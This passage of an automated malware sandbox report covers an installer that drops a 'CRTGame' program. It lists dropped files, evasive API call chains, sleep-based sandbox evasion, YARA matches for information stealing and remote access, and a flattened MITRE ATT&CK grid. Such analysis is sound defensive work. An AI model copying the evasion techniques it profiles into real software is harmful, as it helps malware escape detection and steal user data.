                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-3DBAJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_RegDLL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-1CHIA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_iscrypt.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-GRQ3N.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-MJ59N.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-O5QKP.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-C877S.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-VP35T.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-NJ7JN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-FBHLC.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-GUEH6.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-ITM21.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-B8HMN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-BA6TO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UG8V7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-P0GV3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-6JHM7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-83310.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-JMEV2.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-C9QMS.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-DMP2Q.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-OMKRE.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-63DO2.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-GKK7D.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-EI0VO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-1KFVE.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-D14K1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PBK8V.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-EI90O.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-04UN3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-OGODD.tmpJump to dropped file
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5689
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_6-15805
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6636Thread sleep count: 765 > 30Jump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6636Thread sleep time: -1530000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6900Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6636Thread sleep count: 9194 > 30Jump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6636Thread sleep time: -18388000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_004520C0 FindFirstFileA,GetLastError,1_2_004520C0
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,1_2_00473F08
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00496568
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463404
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463880
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,1_2_00461E78
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeThread delayed: delay time: 60000Jump to behavior
                  Source: crtgame.exe, 00000006.00000002.2944456684.0000000000997000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                  Source: crtgame.exe, 00000006.00000002.2945587982.00000000036F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeAPI call chain: ExitProcess graph end nodegraph_0-6729
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeAPI call chain: ExitProcess graph end nodegraph_4-2128
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeAPI call chain: ExitProcess graph end nodegraph_4-2135
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeAPI call chain: ExitProcess graph end nodegraph_6-15807
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C3FBDE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,6_2_02C3FBDE
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C3FBDE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,6_2_02C3FBDE
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,1_2_0044C030
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C25F2A RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,GetTickCount,wsprintfA,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,6_2_02C25F2A
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C38F48 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_02C38F48
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00476FAC ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00476FAC
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0042DFC4 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042DFC4
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C37A8D cpuid 6_2_02C37A8D
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: GetLocaleInfoA,0_2_004051FC
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: GetLocaleInfoA,0_2_00405248
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: GetLocaleInfoA,1_2_00408570
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: GetLocaleInfoA,1_2_004085BC
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00457CE8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_00457CE8
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00454AB8 GetUserNameA,1_2_00454AB8
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-C877S.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-J3HC1.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-40N44.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-001GJ.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-L705K.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-AT6AE.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-M7CIT.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-P0GV3.tmp, type: DROPPED
                  Source: Yara matchFile source: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2944967183.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: crtgame.exe PID: 5824, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-C877S.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-J3HC1.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-40N44.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-001GJ.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-L705K.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-AT6AE.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-M7CIT.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-P0GV3.tmp, type: DROPPED
                  Source: Yara matchFile source: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2944967183.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: crtgame.exe PID: 5824, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  1
                  Deobfuscate/Decode Files or Information
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  4
                  Windows Service
                  1
                  DLL Side-Loading
                  3
                  Obfuscated Files or Information
                  LSASS Memory1
                  Account Discovery
                  Remote Desktop ProtocolData from Removable Media2
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution
                  1
                  Scheduled Task/Job
                  1
                  Access Token Manipulation
                  23
                  Software Packing
                  Security Account Manager1
                  File and Directory Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Bootkit
                  4
                  Windows Service
                  1
                  DLL Side-Loading
                  NTDS35
                  System Information Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                  Process Injection
                  1
                  Masquerading
                  LSA Secrets41
                  Security Software Discovery
                  SSHKeylogging112
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Scheduled Task/Job
                  21
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials21
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation
                  DCSync11
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                  Process Injection
                  Proc Filesystem3
                  System Owner/User Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Bootkit
                  /etc/passwd and /etc/shadow1
                  Remote System Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
